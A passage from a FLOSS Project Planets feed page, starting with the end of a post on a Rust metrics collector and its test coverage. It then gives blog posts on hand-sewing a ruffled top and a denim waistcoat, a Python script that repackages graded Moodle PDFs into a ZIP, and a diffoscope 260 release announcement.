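                continue  # file vanished between listing and stat
    # hypothetical metric names, for illustration only
    print(f"photo_backlog_files {len(ages)}")
    print(f"photo_backlog_oldest_age_seconds {max(ages, default=0):.0f}")


if __name__ == "__main__":
    main(sys.argv[1])

Redirecting that output into a .prom file in node_exporter's textfile directory is what makes it a “collector”, and also why start-up time matters: the script runs from scratch on every scrape interval.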

And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I’ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing:

  • region coverage: >80%
  • function coverage: >89% (so close here!)
  • line coverage: >95%

I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent for describing tests and assertions in Rust itself, rather than via a separate new DSL, like the shelltest one I was using in Haskell.

To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I’ll be ready for AI to take over coding 😅…

So, for now, I’ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

Categories: FLOSS Project Planets

Valhalla's Things: Elastic Neck Top Two: MOAR Ruffles

Fri, 2024-03-08 19:00
Posted on March 9, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

After making my Elastic Neck Top I knew I wanted to make another one less constrained by the amount of available fabric.

I had a big cut of white cotton voile, I bought some more swimsuit elastic, and I also had a spool of n°100 sewing cotton, but then I postponed the project for a while I was working on other things.

Then FOSDEM 2024 arrived, I was going to remote it, and I was working on my Augusta Stays, but I knew that in the middle of FOSDEM I risked getting to the stage where I needed to leave the computer to try the stays on: not something really compatible with the frenetic pace of a FOSDEM weekend, even one spent at home.

I needed a backup project1, and this was perfect: I already had everything I needed, the pattern and instructions were already on my site (so I didn’t need to take pictures while working), and it was mostly a lot of straight seams, perfect while watching conference videos.

So, on the Friday before FOSDEM I cut all of the pieces, then spent three quarters of FOSDEM on the stays, and when I reached the point where I needed to stop for a fit test I started on the top.

Like the first one, everything was sewn by hand, and one week after I had started everything was assembled, except for the casings for the elastic at the neck and cuffs, which required about 10 km of sewing, and even if it was just a running stitch it made me want to reconsider my lifestyle choices a few times: there was really no reason for me not to do just those seams by machine in a few minutes.

Instead I kept sewing by hand whenever I had time for it, and on the next weekend it was ready. We had a rare day of sun during the weekend, so I wore my thermal underwear, some other layer, a scarf around my neck, and went outside with my SO to have a batch of pictures taken (those in the jeans posts, and others for a post I haven’t written yet. Have I mentioned I have a backlog?).

And then the top went into the wardrobe, and it will come out again when the weather will be a bit warmer. Or maybe it will be used under the Augusta Stays, since I don’t have a 1700 chemise yet, but that requires actually finishing them.

The pattern for this project was already online, of course, but I’ve added a picture of the casing to the relevant section, and everything is as usual #FreeSoftWear.

  1. yes, I could have worked on some knitting WIP, but lately I’m more in a sewing mood.↩︎

Categories: FLOSS Project Planets

Louis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle

Fri, 2024-03-08 18:15

My brain is currently suffering from an overload caused by grading student assignments.

In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work.

I use Moodle for all the classes I teach, and students use it to hand in their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and annotate them using xournalpp and my Wacom tablet.

Once this is done, I have a directory structure that looks like this:

Assignment FooBar/
├── Student A_21100_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student A's perfectly named assignment.pdf
│   └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student B's perfectly named assignment.pdf
│   └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student C's perfectly named assignment.pdf
│   └── Student C's perfectly named assignment.xopp
⋮

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP.

You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this1. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable.

Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.

#!/usr/bin/python3

# Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
This script aims to take a directory containing PDF files exported via
the Moodle mass download function, remove everything but the final
files to submit back to the students and zip it back.

usage: ./moodle-zip.py <target_dir>
"""

import os
import shutil
import sys
import tempfile

from fnmatch import fnmatch


def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory {directory} is not a valid directory")
    if os.path.exists(f"/tmp/{base_directory}.zip"):
        sys.exit(f"Final ZIP file path '/tmp/{base_directory}.zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory {dirname} does not contain a 'graded paper.pdf' file")


def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)


def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/{target_dir}", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/{target_dir}.zip'")


def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)


if __name__ == "__main__":
    main()

If for some reason you happen to have a similar workflow as I and end up using this script, hit me up?

Now, back to grading...

  1. If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons... 

Categories: FLOSS Project Planets

Reproducible Builds (diffoscope): diffoscope 260 released

Thu, 2024-03-07 19:00

The diffoscope maintainers are pleased to announce the release of diffoscope version 260. This version includes the following changes:

[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
  functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
  (and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
  empty one. (Re: Debian:#1064973)

You can find out more by visiting the project homepage.

Categories: FLOSS Project Planets

Valhalla's Things: Denim Waistcoat

Thu, 2024-03-07 19:00
Posted on March 8, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

When I had finished sewing my jeans, I had a scant 50 cm of elastic denim left.

Unrelated to that, I had just finished drafting a vest with Valentina, after the Cutters’ Practical Guide to the Cutting of Ladies Garments.

A new pattern requires a (wearable) mockup. 50 cm of leftover fabric require a quick project. The decision didn’t take a lot of time.

As a mockup, I kept things easy: single layer with no lining, some edges finished with a topstitched hem and some with bias tape, and plain tape on the fronts, to give more support to the buttons and buttonholes.

I did add pockets: not real welt ones (too much effort on denim), but simple slits covered by flaps.

[Image: …piece; there is a slit in the middle that has been finished with topstitching.]

To make them I marked the slits, then cut two rectangles of pocketing fabric, each as wide as the slit + 1.5 cm (width of the pocket) + 3 cm (allowances), and twice the sum of the desired pocket depth + 1 cm (space above the slit) + 1.5 cm (allowances) in height.

Then I put the rectangle on the right side of the denim, aligned so that the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut, turned the pocketing to the wrong side, pressed and topstitched 2 mm from the fold to finish the slit.

[Image: …other sides; it does not lay flat on the right side of the fabric because the finished slit (hidden in the picture) is pulling it.]

Then I turned the pocketing back to the right side, folded it in half, sewed the side and top seams with a small allowance, pressed and turned it again to the wrong side, where I sewed the seams again to make a french seam.

And finally, a simple rectangular denim flap was topstitched to the front, covering the slits.

I wasn’t as precise as I should have been and the pockets aren’t exactly the right size, but they will do to see if I got the positions right (I think that the breast one should be a cm or so lower, the waist ones are fine), and of course they are tiny, but that’s to be expected from a waistcoat.

The other thing that wasn’t exactly as expected is the back: the pattern splits the bottom part of the back to give it “sufficient spring over the hips”. The book was probably published in 1892, but I had already found when drafting the foundation skirt that its idea of “hips” includes a bit of structure. The “enough steel to carry a book or a cup of tea” kind of structure. I should have expected a lot of spring, and indeed that’s what I got.

To fit the bottom part of the back on the limited amount of fabric I had to piece it, and I suspect that the flat felled seam in the center is helping it stick out; I don’t think it’s exactly bad, but it is a peculiar look.

Also, I had to cut the back on the fold, rather than having a seam in the middle and the grain on a different angle.

Anyway, my next waistcoat project is going to have a linen-cotton lining and silk fashion fabric, and I’d say that the pattern is good enough that I can do a few small fixes and cut it directly in the lining, using it as a second mockup.

As for the wrinkles, there is quite a bit, but it looks something that will be solved by a bit of lightweight boning in the side seams and in the front; it will be seen in the second mockup and the finished waistcoat.

As for this one, it’s definitely going to get some wear as is, in casual contexts. Except. Well, it’s a denim waistcoat, right? With a very different cut from the “get a denim jacket and rip out the sleeves”, but still a denim waistcoat, right? The kind that you cover in patches, right?

And I may have screenprinted a “home sewing is killing fashion” patch some time ago, using the SVG from wikimedia commons / the Home Taping is Killing Music page.

And. Maybe I’ll wait until I have finished the real waistcoat. But I suspect that one, and other sewing / costuming patches may happen in the future.

No regrets, as the words on my seam ripper pin say, right? :D

Categories: FLOSS Project Planets
